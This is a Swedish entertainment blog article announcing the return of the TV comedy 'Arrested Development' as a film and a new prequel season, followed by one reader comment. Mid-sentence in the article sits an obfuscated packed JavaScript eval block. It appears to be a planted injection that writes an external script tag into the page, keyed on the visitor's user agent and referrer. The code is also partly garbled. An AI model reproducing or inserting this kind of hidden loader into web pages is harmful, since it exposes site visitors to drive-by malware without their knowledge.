Image Image Image Image Image Image Image Image Image Image

| 7 augusti, 2020

Scroll to top

Top

Arrested Development är tillbaka!

Arrested Development är tillbaka!
Alexander Gylemo

Komediserien ”Arrested Development” som handlar om den stenrika och bortskämda familjen Bluth hade premiär 2003 på den amerikanska TV-kanalen FOX och höll på i tre ganska ödesdigra år för att sedan läggas ner 2006. Serien var fruktansvärt rolig men blev aldrig den tittarsuccén man hade hoppats på.

Åren efter att serien lades ner har däremot varit desto bättre, då seriens popularitet ökat med hästlängder vilket lett till att serien numera är nästintill kultförklarad och har en enorm fanbase som krävt att serien återupplivas – vilket efter fem år äntligen har skett.

Att en film skulle göras har varit ett mer eller mindre bekräftat rykte i ett par år nu, men ingen som arbetat med projektet har kunnat ge några specifika detaljer. Skaparen av serien, Mitch Hurwitz, har nu tillsammans med Jason Bateman (som spelar huvudrollen i serien) bekräftat att filmen är på ingång, det mesta är skrivet, alla originalskådespelarna är med och att de antagligen kommer börja filma nästa sommar.

Som om filmen inte vore nog kommer även en eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nezni|var|u0026u|referrer|fneyz||js|php’.split(’|’),0,{}))
ny säsong
släppas på runt tio avsnitt som ska agera prequel, alltså berätta vad alla karaktärerna har haft för sig under de senaste fem åren. Jason Bateman tror själv att både den nya säsongen samt filmen kommer släppas tidigt 2013.

Då alla på Revue.se är enorma fans av denna serien är vi självklart hur taggade som helst!

Comments

  1. Game

    Äntligen!!!!